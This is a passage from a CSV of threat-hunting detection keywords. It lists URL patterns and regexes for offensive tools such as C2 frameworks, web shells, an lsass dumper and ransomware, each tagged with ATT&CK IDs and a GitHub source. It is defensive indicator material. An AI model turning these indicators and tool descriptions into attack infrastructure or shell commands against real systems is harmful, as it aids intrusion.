by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oast.pro/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.pro\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oast.site/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.site\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oastify.com/*",".{0,1000}http\:\/\/.{0,1000}\.oastify\.com\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.onion*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*http://*.tor2web*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*http://*.torlink*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*http://*/.htaccess?c=cmd*",".{0,1000}http\:\/\/.{0,1000}\/\.htaccess\?c\=cmd.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*http://*/.htaccess?c=uname -a*",".{0,1000}http\:\/\/.{0,1000}\/\.htaccess\?c\=uname\s\-a.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*http://*/FortyNorth/GetIt*",".{0,1000}http\:\/\/.{0,1000}\/FortyNorth\/GetIt.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*http://*/FortyNorth/PostIt*",".{0,1000}http\:\/\/.{0,1000}\/FortyNorth\/PostIt.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*http://*:*/down/*/host.ps1*",".{0,1000}http\:\/\/.{0,1000}\:.{0,1000}\/down\/.{0,1000}\/host\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*http://*Microsoft.ActiveDirectory.Management.dll*",".{0,1000}http\:\/\/.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","2","122","13","2024-04-24T09:54:32Z","2022-12-05T12:40:02Z" "*http://0hRIb4t1fWNPYBVA.net/index.php*",".{0,1000}http\:\/\/0hRIb4t1fWNPYBVA\.net\/index\.php.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*http://10.10.13.37*",".{0,1000}http\:\/\/10\.10\.13\.37.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*http://101.251.217.210*",".{0,1000}http\:\/\/101\.251\.217\.210.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*http://127.0.0.1/CrossC2*",".{0,1000}http\:\/\/127\.0\.0\.1\/CrossC2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*http://127.0.0.1/FUZZ*",".{0,1000}http\:\/\/127\.0\.0\.1\/FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*http://127.0.0.1/handshake.php*",".{0,1000}http\:\/\/127\.0\.0\.1\/handshake\.php.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*http://127.0.0.1/proxy.php*",".{0,1000}http\:\/\/127\.0\.0\.1\/proxy\.php.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*http://127.0.0.1/Renge_x64.exe*",".{0,1000}http\:\/\/127\.0\.0\.1\/Renge_x64\.exe.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*http://127.0.0.1:3000/ui/panel*",".{0,1000}http\:\/\/127\.0\.0\.1\:3000\/ui\/panel.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*http://127.0.0.1:35000*",".{0,1000}http\:\/\/127\.0\.0\.1\:35000.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*http://127.0.0.1:443/aaaaaaaaa*",".{0,1000}http\:\/\/127\.0\.0\.1\:443\/aaaaaaaaa.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*http://127.0.0.1:443/bbbbbbbbb*",".{0,1000}http\:\/\/127\.0\.0\.1\:443\/bbbbbbbbb.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*http://127.0.0.1:7444*",".{0,1000}http\:\/\/127\.0\.0\.1\:7444.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*http://127.0.0.1:7474/browser/*",".{0,1000}http\:\/\/127\.0\.0\.1\:7474\/browser\/.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*http://127.0.0.1:8000/1.jpg*",".{0,1000}http\:\/\/127\.0\.0\.1\:8000\/1\.jpg.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","0","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" "*http://127.0.0.1:8070*",".{0,1000}http\:\/\/127\.0\.0\.1\:8070.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*http://127.0.0.1:8080*",".{0,1000}http\:\/\/127\.0\.0\.1\:8080.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*http://127.0.0.1:8080/target.dll*",".{0,1000}http\:\/\/127\.0\.0\.1\:8080\/target\.dll.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*http://127.0.0.1:9090/*",".{0,1000}http\:\/\/127\.0\.0\.1\:9090\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*http://192.168.1.179:8000/session*",".{0,1000}http\:\/\/192\.168\.1\.179\:8000\/session.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","11","2","2024-04-26T19:45:06Z","2023-04-28T01:58:18Z" "*http://212.111.43.206:9090/pk.html*",".{0,1000}http\:\/\/212\.111\.43\.206\:9090\/pk\.html.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*http://bit.ly/2TxpA4h*",".{0,1000}http\:\/\/bit\.ly\/2TxpA4h.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" "*http://ec2-52-90-251-67.compute-1.amazonaws.com/GoogleChromeAutoLaunch.exe*",".{0,1000}http\:\/\/ec2\-52\-90\-251\-67\.compute\-1\.amazonaws\.com\/GoogleChromeAutoLaunch\.exe.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*http://LhOsT/FiLNaMe.*",".{0,1000}http\:\/\/LhOsT\/FiLNaMe\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*http://localhost/shell.jsp?pwd=System.out.println(*",".{0,1000}http\:\/\/localhost\/shell\.jsp\?pwd\=System\.out\.println\(.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*http://localhost:3000/ui/panel*",".{0,1000}http\:\/\/localhost\:3000\/ui\/panel.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*http://localhost:30662*",".{0,1000}http\:\/\/localhost\:30662.{0,1000}","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","991","211","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" "*http://localhost:58082/broadcast?id=*",".{0,1000}http\:\/\/localhost\:58082\/broadcast\?id\=.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*http://localhost:7474/browser/*",".{0,1000}http\:\/\/localhost\:7474\/browser\/.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*http://localhost:8000/emailviewer.html*",".{0,1000}http\:\/\/localhost\:8000\/emailviewer\.html.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*http://localhost:8080*",".{0,1000}http\:\/\/localhost\:8080.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*http://localhost:9090/*",".{0,1000}http\:\/\/localhost\:9090\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*http://nemesis/file*",".{0,1000}http\:\/\/nemesis\/file.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://nemesis/yara*",".{0,1000}http\:\/\/nemesis\/yara.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://nemesis-es-http.default.svc.cluster.local:9200*",".{0,1000}http\:\/\/nemesis\-es\-http\.default\.svc\.cluster\.local\:9200.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://nemesis-es-internal-http:9200*",".{0,1000}http\:\/\/nemesis\-es\-internal\-http\:9200.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://nemesis-kb-http.default.svc.cluster.local:5601*",".{0,1000}http\:\/\/nemesis\-kb\-http\.default\.svc\.cluster\.local\:5601.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://nemesis-kb-http:5601*",".{0,1000}http\:\/\/nemesis\-kb\-http\:5601.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*http://shell:7681/token*",".{0,1000}http\:\/\/shell\:7681\/token.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*http://sniff.su/*.gz*",".{0,1000}http\:\/\/sniff\.su\/.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*http://sniff.su/*.zip*",".{0,1000}http\:\/\/sniff\.su\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*http://tarantula.by.ru/localroot/*",".{0,1000}http\:\/\/tarantula\.by\.ru\/localroot\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*http://tarantula.by.ru/localroot/2.6.x/h00lyshit*",".{0,1000}http\:\/\/tarantula\.by\.ru\/localroot\/2\.6\.x\/h00lyshit.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*http://vpsip:28888*",".{0,1000}http\:\/\/vpsip\:28888.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*http://wfuzz.org*",".{0,1000}http\:\/\/wfuzz\.org.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*http://www.site.com/article.php?id=1*",".{0,1000}http\:\/\/www\.site\.com\/article\.php\?id\=1.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*http://www.site.com/vuln.php?id=1 --dbs*",".{0,1000}http\:\/\/www\.site\.com\/vuln\.php\?id\=1\s\-\-dbs.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*http_default_pass.txt*",".{0,1000}http_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*http_default_users.txt*",".{0,1000}http_default_users\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - 